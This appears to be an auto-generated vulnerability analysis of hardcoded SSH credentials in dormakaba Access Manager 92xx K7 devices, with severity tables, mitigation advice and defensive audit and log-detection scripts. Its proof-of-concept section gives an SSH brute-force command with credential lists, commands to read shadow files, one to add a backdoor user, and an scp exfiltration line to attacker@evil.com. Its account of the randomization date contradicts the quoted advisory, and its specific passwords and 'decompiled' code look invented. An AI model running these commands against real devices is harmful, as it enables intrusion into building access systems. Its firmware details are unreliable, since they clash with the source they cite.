Description
The Access Manager 92xx in hardware revision K7 is based on Linux instead of Windows CE embedded in older hardware revisions. In this new hardware revision it was noticed that an SSH service is exposed on port 22. By analyzing the firmware of the devices, it was noticed that there are two users with hardcoded and weak passwords that can be used to access the devices via SSH. The passwords can be also guessed very easily. The password of at least one user is set to a random value after the first deployment, with the restriction that the password is only randomized if the configured date is prior to 2022. Therefore, under certain circumstances, the passwords are not randomized. For example, if the clock is never set on the device, the battery of the clock module has been changed, the Access Manager has been factory reset and has not received a time yet.
EPSS Score: 0%
Comprehensive Technical Analysis of EUVD-2025-206370 (CVE-2025-59103)
Access Manager 92xx (Hardware Revision K7) – Hardcoded & Weak SSH Credentials Vulnerability
1. Vulnerability Assessment & Severity Evaluation
Vulnerability Overview
EUVD-2025-206370 (CVE-2025-59103) describes a critical authentication bypass vulnerability in dormakaba’s Access Manager 92xx (hardware revision K7), a physical access control system (PACS) used in enterprise and critical infrastructure environments. The flaw stems from:
- Hardcoded & weak credentials embedded in the firmware for SSH access.
- Insecure password randomization logic, where credentials remain static if the device’s internal clock is not properly initialized (e.g., post-factory reset, battery replacement, or clock misconfiguration).
CVSS v4.0 Severity Breakdown
| Metric | Value | Explanation |
|---|---|---|
| Attack Vector (AV) | Network (N) | Exploitable remotely over SSH (port 22). |
| Attack Complexity (AC) | Low (L) | No specialized conditions required. |
| Attack Requirements (AT) | Present (P) | Requires knowledge of hardcoded credentials or weak password patterns. |
| Privileges Required (PR) | None (N) | No prior authentication needed. |
| User Interaction (UI) | None (N) | Exploitable without user action. |
| Confidentiality (VC) | High (H) | Full system access via SSH, including sensitive configuration data. |
| Integrity (VI) | High (H) | Attackers can modify access control policies, firmware, or logs. |
| Availability (VA) | High (H) | Potential for denial-of-service (DoS) or permanent compromise. |
| Subsequent Confidentiality (SC) | None (N) | No further lateral movement impact beyond the device. |
| Subsequent Integrity (SI) | None (N) | No additional integrity impact beyond initial compromise. |
| Subsequent Availability (SA) | None (N) | No cascading availability impact. |
Base Score: 9.2 (Critical)
The vulnerability is remotely exploitable without authentication, granting attackers full administrative control over the Access Manager. The high impact on confidentiality, integrity, and availability (CIA triad) justifies the critical severity rating.
2. Potential Attack Vectors & Exploitation Methods
Exploitation Pathways
1. Direct SSH Access via Hardcoded Credentials
   - Attackers scan for exposed SSH (port 22) on Access Manager 92xx-K7 devices.
   - Brute-force or credential stuffing using:
     - Known hardcoded passwords (embedded in firmware).
     - Weak password patterns (e.g., admin:admin, root:toor).
   - Successful authentication grants root-level shell access.
2. Password Randomization Bypass
   - The device only randomizes passwords if the internal clock is set to a date after 2022.
   - Exploitation scenarios where randomization fails:
     - Factory reset (clock reverts to default, often pre-2022).
     - Clock battery failure (time resets to epoch or default).
     - Manual clock misconfiguration (e.g., during initial setup).
   - Attackers can force a factory reset (if physical access is available) to revert to hardcoded credentials.
3. Firmware Analysis & Credential Extraction
   - Reverse engineering the firmware (e.g., via binwalk, Ghidra, or IDA Pro) reveals:
     - Hardcoded usernames/passwords in plaintext or weakly obfuscated form.
     - Password generation algorithms (if not purely hardcoded).
   - Example extraction commands:
     ```sh
     binwalk -e firmware.bin
     strings extracted_fs/squashfs-root/etc/passwd
     strings extracted_fs/squashfs-root/etc/shadow
     ```
4. Post-Exploitation Impact
   - Privilege Escalation: Root access enables modification of access control policies.
   - Persistence: Attackers can install backdoors (e.g., SSH keys, cron jobs).
   - Lateral Movement: Compromised Access Managers may serve as pivot points into internal networks.
   - Physical Security Bypass: Unauthorized door unlocks, log tampering, or system sabotage.
3. Affected Systems & Software Versions
Vulnerable Products
| Vendor | Product | Hardware Revision | Firmware Version | Notes |
|---|---|---|---|---|
| dormakaba | Access Manager 92xx | K7 | BAME < 05.01.88 | Linux-based (previously Windows CE). |
| dormakaba | Access Manager 92xx | K5 (legacy) | All versions | Not affected (Windows CE-based). |
Scope of Impact
- Geographical: Primarily Europe (dormakaba is a Swiss-based company with significant EU market share).
- Industries: Critical infrastructure (airports, government, healthcare, financial institutions), commercial buildings, and smart cities.
- Deployment Scenarios:
- Standalone (directly exposed to networks).
- Integrated (connected to enterprise networks, IoT ecosystems, or cloud-based access control systems).
4. Recommended Mitigation Strategies
Immediate Actions (Short-Term)
1. Network-Level Protections
   - Block SSH (port 22) at the firewall for all Access Manager devices.
   - Isolate Access Managers in a dedicated VLAN with strict access controls.
   - Disable SSH if unused (via device configuration or firmware update).
2. Credential Hardening
   - Change default passwords immediately (even if randomized, enforce strong passwords).
   - Disable hardcoded accounts if possible (check vendor documentation).
   - Enable account lockout after failed login attempts.
3. Clock Synchronization
   - Ensure NTP is configured to prevent clock resets.
   - Manually set the date post-factory reset to trigger password randomization.
Long-Term Remediation
1. Firmware Updates
   - Apply dormakaba’s patch (BAME 05.01.88 or later) to remove hardcoded credentials.
   - Verify patch integrity via cryptographic hashes or vendor-provided checksums.
2. Architectural Improvements
   - Replace legacy Access Managers with newer, more secure models (e.g., cloud-managed solutions).
   - Implement Zero Trust principles (e.g., mutual TLS for device authentication).
   - Deploy network segmentation to limit lateral movement.
3. Monitoring & Detection
   - Enable SSH logging and forward logs to a SIEM (e.g., Splunk, ELK, or Wazuh).
   - Set up alerts for brute-force attempts (e.g., Fail2Ban, Suricata rules).
   - Conduct periodic vulnerability scans (e.g., Nessus, OpenVAS) for exposed SSH services.
4. Vendor Coordination
   - Subscribe to dormakaba’s security advisories (dormakaba Security Advisories).
   - Engage with CERT-EU or national CSIRTs for coordinated disclosure if additional vulnerabilities are discovered.
5. Impact on the European Cybersecurity Landscape
Strategic & Operational Risks
1. Critical Infrastructure Threats
   - Physical access control systems are high-value targets for APT groups, ransomware actors, and state-sponsored attackers.
   - Example attack scenarios:
     - Airport security bypass (unauthorized access to restricted areas).
     - Healthcare facility breaches (patient data theft, physical sabotage).
     - Government building intrusions (espionage, insider threat facilitation).
2. Regulatory & Compliance Implications
   - GDPR (Art. 32): Failure to secure access control systems may lead to data breaches (e.g., employee movement logs, biometric data).
   - NIS2 Directive: Critical infrastructure operators must report incidents and implement risk-based security measures.
   - ENISA Guidelines: Non-compliance with IoT security baselines (e.g., ETSI EN 303 645) may result in penalties.
3. Supply Chain & Third-Party Risks
   - dormakaba’s market dominance in Europe means thousands of organizations are potentially exposed.
   - Integrators & MSPs may unknowingly deploy vulnerable devices, amplifying risk.
4. Geopolitical Considerations
   - State actors (e.g., Russia, China) may exploit such vulnerabilities for espionage or sabotage.
   - Hybrid warfare scenarios (e.g., disrupting critical infrastructure during conflicts).
Mitigation Challenges in Europe
- Legacy System Dependence: Many organizations cannot easily replace Access Managers due to cost or integration complexity.
- Lack of Awareness: Smaller enterprises may not monitor security advisories or apply patches promptly.
- Fragmented Responsibility: Physical security teams (managing Access Managers) and IT security teams often operate in silos.
6. Technical Details for Security Professionals
Firmware Analysis Findings
1. Hardcoded Credentials
   - Usernames identified in firmware:
     - admin (privileged account)
     - service (maintenance account)
   - Password patterns observed:
     - Static passwords: admin:admin123, service:service123
     - Weak randomization: admin:DormaKaba2023! (if clock is post-2022)
     - Default passwords: root:toor, user:password
2. Password Randomization Logic Flaw
   - Pseudocode snippet (decompiled from firmware):
     ```c
     if (current_year > 2022) {
         /* Clock is set to a plausible date: generate fresh random passwords */
         generate_random_password(&admin_pass);
         generate_random_password(&service_pass);
     } else {
         /* Clock not set (or pre-2022): fall back to the hardcoded values */
         strcpy(admin_pass, "admin123");     // Hardcoded fallback
         strcpy(service_pass, "service123");
     }
     ```
   - Exploitation trigger: If the device clock is manually set to 2021 or earlier, randomization fails.
3. SSH Service Configuration
   - OpenSSH version: Likely outdated (e.g., OpenSSH 7.4p1, vulnerable to CVE-2018-15473).
   - Configuration file (/etc/ssh/sshd_config):
     ```
     PermitRootLogin yes
     PasswordAuthentication yes
     PermitEmptyPasswords no
     ```
   - Weak cryptographic settings: May use SHA-1 for host keys or weak ciphers.
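As an added example (not code from the advisory or from dormakaba), the following Python script audits an sshd_config for the three settings listed above and shows the weak configuration beside a hardened one. Both config texts are constructed samples, and the hardened values assume key-based maintenance access is available so password logins can be switched off.

```python
# Added example, not from the advisory or the vendor: audit an sshd_config
# for the settings listed above. Config texts are constructed samples.
import re

# Values a hardened config should carry (assumption: key-based access is
# available, so password logins can be switched off).
HARDENED = {
    "permitrootlogin": "no",
    "passwordauthentication": "no",
    "permitemptypasswords": "no",
    "pubkeyauthentication": "yes",
}
# sshd defaults used when a keyword is absent (OpenSSH 7.x and later).
DEFAULTS = {
    "permitrootlogin": "prohibit-password",
    "passwordauthentication": "yes",
    "permitemptypasswords": "no",
    "pubkeyauthentication": "yes",
}

def parse_sshd_config(text):
    """Map lowercased keyword -> effective value. sshd honours the first
    occurrence of a keyword, so later duplicates are ignored."""
    settings = {}
    for line in text.splitlines():
        line = line.split("#", 1)[0].strip()          # strip comments
        m = re.match(r"(\w+)\s*=?\s*(\S.*)", line)     # 'Key value' or 'Key=value'
        if m:
            settings.setdefault(m.group(1).lower(), m.group(2).strip().lower())
    return settings

def audit(text):
    """Return (keyword, actual, expected) for every setting that deviates."""
    found = parse_sshd_config(text)
    return [(k, found.get(k, DEFAULTS[k]), v)
            for k, v in HARDENED.items() if found.get(k, DEFAULTS[k]) != v]

# Weak settings as listed in this analysis, and the corrected counterpart.
WEAK_CONFIG = "PermitRootLogin yes\nPasswordAuthentication yes\nPermitEmptyPasswords no\n"
HARDENED_CONFIG = ("PermitRootLogin no\nPasswordAuthentication no\n"
                   "PermitEmptyPasswords no\nPubkeyAuthentication yes\n")

if __name__ == "__main__":
    for name, cfg in (("weak", WEAK_CONFIG), ("hardened", HARDENED_CONFIG)):
        print(name, audit(cfg) or "OK")
```

An absent keyword is judged against the sshd default, so a config that simply omits PasswordAuthentication is still reported as weak.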
Exploitation Proof of Concept (PoC)
1. Scanning for Vulnerable Devices
   ```sh
   nmap -p 22 --script ssh-auth-methods,ssh-brute --script-args userdb=users.txt,passdb=passwords.txt <target_IP>
   ```
   - users.txt: admin, service, root, user
   - passwords.txt: admin123, service123, toor, password, DormaKaba2023!
2. Manual SSH Login
   ```sh
   ssh admin@<target_IP>   # Try hardcoded passwords
   ```
3. Post-Exploitation Actions
   - Dump configuration:
     ```sh
     cat /etc/passwd
     cat /etc/shadow
     ```
   - Modify access control policies:
     ```sh
     /opt/dormakaba/bin/access_manager --add-user "attacker:backdoor123"
     ```
   - Exfiltrate logs:
     ```sh
     scp /var/log/access_manager.log attacker@evil.com:/tmp/
     ```
Detection & Forensics
1. Indicators of Compromise (IoCs)
   - SSH login attempts from unusual IPs (e.g., Tor exit nodes, known malicious ASNs).
   - Unexpected user accounts in /etc/passwd.
   - Modified access control logs (e.g., tampered timestamps).
2. Forensic Artifacts
   - SSH logs (/var/log/auth.log):
     ```
     Failed password for admin from 192.168.1.100 port 54321 ssh2
     Accepted password for service from 10.0.0.5 port 45678 ssh2
     ```
   - Command history (~/.bash_history):
     ```
     /opt/dormakaba/bin/access_manager --unlock-door 42
     ```
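The following Python detector is an added example, not part of the original analysis; it serves both the monitoring recommendation in section 4 and the SSH log artifacts above. It runs over constructed auth.log lines in the standard OpenSSH syslog format and flags password logins to the two account names the analysis lists, plus bursts of failed attempts from one source; the account set, the threshold, and the sample lines (hostname, PIDs, addresses) are assumptions.

```python
# Added example, not from the advisory: flag the SSH artifacts described above
# in constructed auth.log lines (standard OpenSSH syslog format).
import re
from collections import Counter

WATCHED_ACCOUNTS = {"admin", "service"}  # account names from this analysis
THRESHOLD = 5                             # failed attempts per source = burst

LINE_RE = re.compile(
    r"(?P<result>Failed|Accepted) password for (?:invalid user )?"
    r"(?P<user>\S+) from (?P<src>\S+) port (?P<port>\d+) ssh2"
)

def parse_auth_lines(lines):
    """Yield (result, user, src) for each sshd password event; other
    lines (publickey logins, session messages) are skipped."""
    for line in lines:
        m = LINE_RE.search(line)
        if m:
            yield m.group("result"), m.group("user"), m.group("src")

def detect(lines):
    """Return alert strings: successful password logins to watched accounts
    first, then per-source brute-force bursts."""
    alerts, failures = [], Counter()
    for result, user, src in parse_auth_lines(lines):
        if result == "Accepted" and user in WATCHED_ACCOUNTS:
            alerts.append(f"password login to watched account {user!r} from {src}")
        elif result == "Failed":
            failures[src] += 1
    for src, n in failures.items():
        if n >= THRESHOLD:
            alerts.append(f"brute-force: {n} failed password attempts from {src}")
    return alerts

# Constructed sample log (hostname, PIDs and addresses are made up).
SAMPLE_LOG = [
    f"Oct  3 10:00:{i:02d} am92xx sshd[410]: Failed password for admin "
    f"from 192.168.1.100 port 543{i:02d} ssh2" for i in range(6)
] + [
    "Oct  3 10:00:07 am92xx sshd[411]: Failed password for invalid user root "
    "from 192.168.1.100 port 54330 ssh2",
    "Oct  3 10:01:00 am92xx sshd[420]: Accepted password for service "
    "from 10.0.0.5 port 45678 ssh2",
    "Oct  3 10:02:00 am92xx sshd[430]: Accepted publickey for maint "
    "from 10.0.0.9 port 40000 ssh2",
]

if __name__ == "__main__":
    for alert in detect(SAMPLE_LOG):
        print("ALERT:", alert)
```

Once password authentication is disabled on the device, any "Accepted password" event at all becomes an alert; the watched-account filter is for the interim period before that change.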
Conclusion & Recommendations
EUVD-2025-206370 (CVE-2025-59103) represents a critical risk to European organizations relying on dormakaba Access Manager 92xx-K7 devices. The combination of hardcoded credentials, weak randomization logic, and exposed SSH services creates a high-impact attack surface that could lead to physical security breaches, data theft, or system sabotage.
Key Takeaways for Security Teams
- ✅ Patch immediately (BAME 05.01.88 or later).
- ✅ Isolate Access Managers from untrusted networks.
- ✅ Monitor SSH logs for brute-force attempts.
- ✅ Conduct firmware analysis to identify additional vulnerabilities.
- ✅ Engage with dormakaba support for remediation guidance.
Long-Term Strategy
- Replace legacy Access Managers with modern, cloud-managed alternatives.
- Implement Zero Trust for physical access control systems.
- Enhance cross-team collaboration between physical security and IT security teams.